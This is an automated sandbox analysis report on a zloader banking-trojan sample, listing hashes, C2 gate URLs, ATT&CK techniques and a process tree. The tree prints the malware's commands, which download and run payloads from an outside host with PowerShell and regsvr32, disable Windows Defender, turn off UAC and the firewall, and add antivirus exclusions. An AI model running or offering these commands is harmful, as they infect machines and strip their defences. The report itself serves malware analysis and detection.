zloader | 26b22c0b1b4aab76f6a483ae3aec9f4eface7c7f5aeb546554afdf4ab0d54a6f

Analysis

max time kernel
69s
max time network
149s
platform
windows10_x64
resource
win10v20210410
submitted
13-08-2021 08:15

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

f53350e79061f139201dfe86a38c3c36.exe
Size

165KB
MD5

f53350e79061f139201dfe86a38c3c36
SHA1

90b00fc5d9a4018df2db6bca54f9a37082053989
SHA256

26b22c0b1b4aab76f6a483ae3aec9f4eface7c7f5aeb546554afdf4ab0d54a6f
SHA512

4576dca186150fbd0c6db080d943a361556f7e6a0bf0abca5c2c3086e2c347b7cf1ba9c9f202be19ec6bff898f02960bb3fc39173f619068910aa1491ac4594e

Score

10^/10

zloader vasja vasja botnet evasion persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 2052 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

3164 regsvr32.exe

flow	pid	process
7	2052	powershell.exe

pid	process
3164	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

f53350e79061f139201dfe86a38c3c36.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	f53350e79061f139201dfe86a38c3c36.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	f53350e79061f139201dfe86a38c3c36.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2052 powershell.exe
2052 powershell.exe
2052 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2052 powershell.exe

pid	process
2052	powershell.exe
2052	powershell.exe
2052	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2052	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

f53350e79061f139201dfe86a38c3c36.execmd.exeregsvr32.exe

description	pid	process	target process
PID 4012 wrote to memory of 1204	4012	f53350e79061f139201dfe86a38c3c36.exe	cmd.exe
PID 4012 wrote to memory of 1204	4012	f53350e79061f139201dfe86a38c3c36.exe	cmd.exe
PID 1204 wrote to memory of 2052	1204	cmd.exe	powershell.exe
PID 1204 wrote to memory of 2052	1204	cmd.exe	powershell.exe
PID 1204 wrote to memory of 3572	1204	cmd.exe	regsvr32.exe
PID 1204 wrote to memory of 3572	1204	cmd.exe	regsvr32.exe
PID 3572 wrote to memory of 3164	3572	regsvr32.exe	regsvr32.exe
PID 3572 wrote to memory of 3164	3572	regsvr32.exe	regsvr32.exe
PID 3572 wrote to memory of 3164	3572	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\f53350e79061f139201dfe86a38c3c36.exe
"C:\Users\Admin\AppData\Local\Temp\f53350e79061f139201dfe86a38c3c36.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4012

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/JavaN.dll -OutFile JavaN.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052

C:\Windows\system32\regsvr32.exe
regsvr32 JavaN.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:3572

C:\Windows\SysWOW64\regsvr32.exe
JavaN.dll
4⤵
- Loads dropped DLL
PID:3164

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:2836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:3884

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:376

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:1236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
4⤵
PID:188

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:2268

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:3172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
4⤵
PID:2568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
4⤵
PID:3792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
4⤵
PID:848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
4⤵
PID:3848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
4⤵
PID:1648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
4⤵
PID:3660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
PID:3060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
PID:3196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
4⤵
PID:1920

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
5⤵
PID:3580

C:\Windows\system32\shutdown.exe
shutdown.exe /r /f /t 00
4⤵
PID:2420

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d
1⤵
PID:3896

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
18849ea673c0b27d31126717dbfd205f

SHA1
8f13d1fbf740d73c468a8b84688ca73de945912e

SHA256
2dec61e81e46ebeff0225bf5c6846be57efda4e8b9febe53daa040556a3b7720

SHA512
e1e6006b1b6baf18229fa98efd5ed8c44d5bdc74d9fda486714fb01cde00c834fee8503cc036c48463372b3cdda8a645a6390da85dc5ace0978d4b0cf690e6ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2fff29c3aa1c02fb0f9ea12f8a411802

SHA1
7e634696ed9478cfcc2d14ceb7a65ddaa9e0db42

SHA256
7183b68ebeb2e568a480bb7424b1adcb26e599a463c409857be023dd706afdfb

SHA512
86729d48a9b9a320f6351552c186a2a21721ee37bf7724bb30aae3c103148000434b06b9a5febd7ef99c47b01093fe87bef1ff105c866fe6ff676b0adc9d8b33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ec49f58ef11535880bc8d40a2a6328f6

SHA1
1c6f28a064ae3ba4496335dbcaf133b8dcebbbdb

SHA256
44b866e8313cbc3ba64f3262b919822aeee0bee7169836290dc4f39c623941b6

SHA512
0dce0dd820fce6255aed8948f388ff8cfe8380d07801c9d0c4de144c57641a93b40641e0ece2f7b002878b11c36ad2d6894eb906907a987a97774f00a352face

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2e4ee17ca27ea206018620ac91708893

SHA1
d211e93b7351974e519a6f4e8654f06b858e1342

SHA256
67c58dce2984ee4f09c3655b4a152c5b04460a8d20b11abddfdb811d9f85b458

SHA512
9b97e0879a01735a17e85bd470855212d4c697560591a7292283cbb4662d01bc6bb581c41b0625604ad208a5b773b34de52b4e707cc96383304333fdaae4f685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f7f62d9482a5b980800dbe0ba38eccb5

SHA1
3fddfdb343fc5ade0a06a54afbf3bf069f01e1da

SHA256
8917a432cfe6680ead39ed7c8e9ed3f4d8af4c45c6f426d500681badd0b09f80

SHA512
42ca0a6face622e6cbe7e8d136e85e76ac8871b566e69c20247af6598f03c91a30a0fb8e9117079be5d6e4e87edaf989e4568e683095233677f07c66b2f98411

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0cdade75aac86d3183590328ce23a4a1

SHA1
81ffbc5bd4f9f41f33753015872f5a51e5564e61

SHA256
b1bfbb021db286758ef09f0190b175c5709176c19db4f4c514728224360f4ec7

SHA512
2fd46b58ad0c641360e66e7cb6f4c1fb30b7564fdd1bc1a8d23d69a53f3324446c7dba9f69f63eeaa25619cc9e7f6d17d6d4e0be7ab58795043a611a0ee49eac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
30dd67aaf3cfd8e826dc3034a82a78a6

SHA1
13d2505e7ce3a0299f534b4c9c0d10c56cc8cf8b

SHA256
096802280faf7a137f00b2d4f134636ac3239b46ec73a5d213e54530ff3139f3

SHA512
97fda35451c97fafd79f2b5a7715bd9521f1937be218c2c255214c5495627f0814b6c0bdf7952186aae3a31e1a21b713ca176119ebc3218dbfcefd9fcf5d1466

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
be7039ed3239a4a8a3fe34258830c7ff

SHA1
210ce7996c4489e3fd731e0d1046a61eb4c0c48e

SHA256
6875eb549719960a5c7963c2de1ef1a647376f52d2db1b2100694145c6f71f74

SHA512
4daeb0478d549036690910322344514fb56c9a6de498d7be08c381ee77e09897133ef8a29e020dbbddd9a9b38ee177a148572b874e8a893a5e615548183b29a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d44736f928fa684ea20a8fcf45a80c63

SHA1
80bad1f0bd5b8c3f83545e3afdacc5e18b20f05e

SHA256
6649b3166423283bd1fd7dbdade22cce45ccaaca6a47c236b61179f7713b3d9b

SHA512
0d01c0edf06a473de2fb10a8dcacafeefe7f7eb13b625e2559e5f93fe86c85704ee23036c802e5bf837ac53c0cdda7810bd1f56c7e9bf16f7c655d082fc92b02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1cc059c574cf76634481cee69b73c687

SHA1
d8e68a0cf48357f0155839cf8d7399450b90284e

SHA256
e1fd16f56b37cb2f4e03b2df06d8fc648efce7ff35a9de92e47919ce31853fb1

SHA512
53a6b63cdc3af34afeb7f4e5e1968e7050c88f5eb50eb95dcab45254241eb57e811813cb64ff72b1863d8483d37e7c91047b7093d9078bf442dbb752bf21b5ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
565dcbc9cda8fb7edf62e453bc3a2787

SHA1
0c6d7aa203a2a53368abab179d936b0855f9426e

SHA256
608594de51617b2f3bd4758ff317d2d80c305f4b90f483153df365e35d338dde

SHA512
a114648325608b5fb9717d232b04fe2d4236fff30adbf85f9fa7c8556b39838f1c67134d2a6387a397228efbe75884551ab73ac6942ae22b6583b31f124e135c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a533d63f1e481e728908c3c971bc64b3

SHA1
cce62e23150d5e21b8f4d03e72c34eb36c5f1721

SHA256
a51adddee572ca6b9f44ccb52cf79079ae07b59308d23d11c7b7b40afa659126

SHA512
724bbd5fc95d7f48869dc15c015414ab68c456b01219b288ffd4d9b015809289828151f59352d60465cd41848144898a616712c7bd8ced9a43bac26e5cc89a41

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
6ec3249fe894347adf88914507bb3988

SHA1
3ef4f723961a5787f89cda88a035762341189427

SHA256
49e15a108b97b2d42d2f784cb9413a6742c09a551f361edc0d1943eac2883696

SHA512
54d7021a0dc75cac00bc76c1c35c50b5c01fc7ec5b923297d302768be594bf35372d89ed5d01c53d90a54c06fd174dfa51a7fec66f72f0a311f000283b26f00c

Download Submit
C:\Users\Admin\AppData\Roaming\JavaN.dll
MD5
01e37eb89bd9cc3211ea5312d77d09e6

SHA1
d5f5f5d953e1e90cf070dd81b14e4b38499bfc10

SHA256
b4783737e1404098a60fb3896ba6e5f0029d3448b5ab230a44ef07d429910749

SHA512
f1efc04ca7b853ada2f29efb1a417134e07c2ae51fd61301c1e0fa92446d1a0d6f7898b613b5399359e0c04bb4c10151bc62a721f4f5f66f66f1928342814bc9

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
995c3f852ca1e81fc395a5c46b06cb9e

SHA1
0bc6bc2e425eef07669fa877573b9ba5513ae833

SHA256
81c64df94f955a49ea7b12ed58098b3dd43c02a28c2f3484c9d4aec0929ddfeb

SHA512
62dd4f3051917942ee5cae765f4fa0f4da96c49eafd4f00a978f84ddf139488e78a896ff3bdd307dc7d0bfe1902525aa446d7878f016c5ce895bdaee524eebaf

Download Submit
\Users\Admin\AppData\Roaming\JavaN.dll
MD5
01e37eb89bd9cc3211ea5312d77d09e6

SHA1
d5f5f5d953e1e90cf070dd81b14e4b38499bfc10

SHA256
b4783737e1404098a60fb3896ba6e5f0029d3448b5ab230a44ef07d429910749

SHA512
f1efc04ca7b853ada2f29efb1a417134e07c2ae51fd61301c1e0fa92446d1a0d6f7898b613b5399359e0c04bb4c10151bc62a721f4f5f66f66f1928342814bc9

Download Submit
memory/188-182-0x0000029672803000-0x0000029672805000-memory.dmp

Filesize
8KB

Download
memory/188-190-0x0000029672806000-0x0000029672808000-memory.dmp

Filesize
8KB

Download
memory/188-171-0x0000000000000000-mapping.dmp

Download
memory/188-181-0x0000029672800000-0x0000029672802000-memory.dmp

Filesize
8KB

Download
memory/376-168-0x0000000000000000-mapping.dmp

Download
memory/820-209-0x000001BAA9953000-0x000001BAA9955000-memory.dmp

Filesize
8KB

Download
memory/820-208-0x000001BAA9950000-0x000001BAA9952000-memory.dmp

Filesize
8KB

Download
memory/820-210-0x000001BAA9956000-0x000001BAA9958000-memory.dmp

Filesize
8KB

Download
memory/820-196-0x0000000000000000-mapping.dmp

Download
memory/848-325-0x000001627D9E3000-0x000001627D9E5000-memory.dmp

Filesize
8KB

Download
memory/848-312-0x0000000000000000-mapping.dmp

Download
memory/848-349-0x000001627D9E8000-0x000001627D9E9000-memory.dmp

Filesize
4KB

Download
memory/848-348-0x000001627D9E6000-0x000001627D9E8000-memory.dmp

Filesize
8KB

Download
memory/848-324-0x000001627D9E0000-0x000001627D9E2000-memory.dmp

Filesize
8KB

Download
memory/1204-114-0x0000000000000000-mapping.dmp

Download
memory/1236-170-0x0000000000000000-mapping.dmp

Download
memory/1648-389-0x0000000000000000-mapping.dmp

Download
memory/1648-419-0x00000174E6A73000-0x00000174E6A75000-memory.dmp

Filesize
8KB

Download
memory/1648-420-0x00000174E6A76000-0x00000174E6A78000-memory.dmp

Filesize
8KB

Download
memory/1648-418-0x00000174E6A70000-0x00000174E6A72000-memory.dmp

Filesize
8KB

Download
memory/1648-432-0x00000174E6A78000-0x00000174E6A79000-memory.dmp

Filesize
4KB

Download
memory/1920-524-0x000001565D896000-0x000001565D898000-memory.dmp

Filesize
8KB

Download
memory/1920-508-0x0000000000000000-mapping.dmp

Download
memory/1920-520-0x000001565D890000-0x000001565D892000-memory.dmp

Filesize
8KB

Download
memory/1920-521-0x000001565D893000-0x000001565D895000-memory.dmp

Filesize
8KB

Download
memory/2052-121-0x0000025EEF110000-0x0000025EEF111000-memory.dmp

Filesize
4KB

Download
memory/2052-123-0x0000025EEF103000-0x0000025EEF105000-memory.dmp

Filesize
8KB

Download
memory/2052-116-0x0000000000000000-mapping.dmp

Download
memory/2052-134-0x0000025EEF106000-0x0000025EEF108000-memory.dmp

Filesize
8KB

Download
memory/2052-122-0x0000025EEF100000-0x0000025EEF102000-memory.dmp

Filesize
8KB

Download
memory/2052-126-0x0000025EEF2C0000-0x0000025EEF2C1000-memory.dmp

Filesize
4KB

Download
memory/2268-192-0x0000000000000000-mapping.dmp

Download
memory/2420-523-0x0000000000000000-mapping.dmp

Download
memory/2568-244-0x00000228E87A0000-0x00000228E87A2000-memory.dmp

Filesize
8KB

Download
memory/2568-271-0x00000228E87A8000-0x00000228E87A9000-memory.dmp

Filesize
4KB

Download
memory/2568-268-0x00000228E87A6000-0x00000228E87A8000-memory.dmp

Filesize
8KB

Download
memory/2568-245-0x00000228E87A3000-0x00000228E87A5000-memory.dmp

Filesize
8KB

Download
memory/2568-234-0x0000000000000000-mapping.dmp

Download
memory/2836-156-0x0000000002930000-0x0000000002956000-memory.dmp

Filesize
152KB

Download
memory/2836-142-0x0000000000000000-mapping.dmp

Download
memory/3060-464-0x0000022C74780000-0x0000022C74782000-memory.dmp

Filesize
8KB

Download
memory/3060-479-0x0000022C74786000-0x0000022C74788000-memory.dmp

Filesize
8KB

Download
memory/3060-465-0x0000022C74783000-0x0000022C74785000-memory.dmp

Filesize
8KB

Download
memory/3060-450-0x0000000000000000-mapping.dmp

Download
memory/3164-138-0x0000000000000000-mapping.dmp

Download
memory/3164-140-0x0000000002E90000-0x0000000002FDA000-memory.dmp

Filesize
1.3MB

Download
memory/3164-141-0x0000000010000000-0x000000001015D000-memory.dmp

Filesize
1.4MB

Download
memory/3172-194-0x0000000000000000-mapping.dmp

Download
memory/3196-519-0x000001BBBF4F8000-0x000001BBBF4F9000-memory.dmp

Filesize
4KB

Download
memory/3196-467-0x0000000000000000-mapping.dmp

Download
memory/3196-480-0x000001BBBF4F0000-0x000001BBBF4F2000-memory.dmp

Filesize
8KB

Download
memory/3196-484-0x000001BBBF4F6000-0x000001BBBF4F8000-memory.dmp

Filesize
8KB

Download
memory/3196-481-0x000001BBBF4F3000-0x000001BBBF4F5000-memory.dmp

Filesize
8KB

Download
memory/3572-136-0x0000000000000000-mapping.dmp

Download
memory/3580-518-0x0000000000000000-mapping.dmp

Download
memory/3660-428-0x0000000000000000-mapping.dmp

Download
memory/3660-447-0x0000024AB1C46000-0x0000024AB1C48000-memory.dmp

Filesize
8KB

Download
memory/3660-435-0x0000024AB1C40000-0x0000024AB1C42000-memory.dmp

Filesize
8KB

Download
memory/3660-434-0x0000024AB1C43000-0x0000024AB1C45000-memory.dmp

Filesize
8KB

Download
memory/3792-273-0x0000000000000000-mapping.dmp

Download
memory/3792-310-0x000001FCFF8D8000-0x000001FCFF8D9000-memory.dmp

Filesize
4KB

Download
memory/3792-286-0x000001FCFF8D6000-0x000001FCFF8D8000-memory.dmp

Filesize
8KB

Download
memory/3792-285-0x000001FCFF8D0000-0x000001FCFF8D2000-memory.dmp

Filesize
8KB

Download
memory/3792-287-0x000001FCFF8D3000-0x000001FCFF8D5000-memory.dmp

Filesize
8KB

Download
memory/3848-351-0x0000000000000000-mapping.dmp

Download
memory/3848-365-0x0000022D5C516000-0x0000022D5C518000-memory.dmp

Filesize
8KB

Download
memory/3848-363-0x0000022D5C510000-0x0000022D5C512000-memory.dmp

Filesize
8KB

Download
memory/3848-364-0x0000022D5C513000-0x0000022D5C515000-memory.dmp

Filesize
8KB

Download
memory/3848-390-0x0000022D5C518000-0x0000022D5C519000-memory.dmp

Filesize
4KB

Download
memory/3884-166-0x000001D83A116000-0x000001D83A118000-memory.dmp

Filesize
8KB

Download
memory/3884-158-0x000001D83A113000-0x000001D83A115000-memory.dmp

Filesize
8KB

Download
memory/3884-157-0x000001D83A110000-0x000001D83A112000-memory.dmp

Filesize
8KB

Download
memory/3884-145-0x0000000000000000-mapping.dmp

Download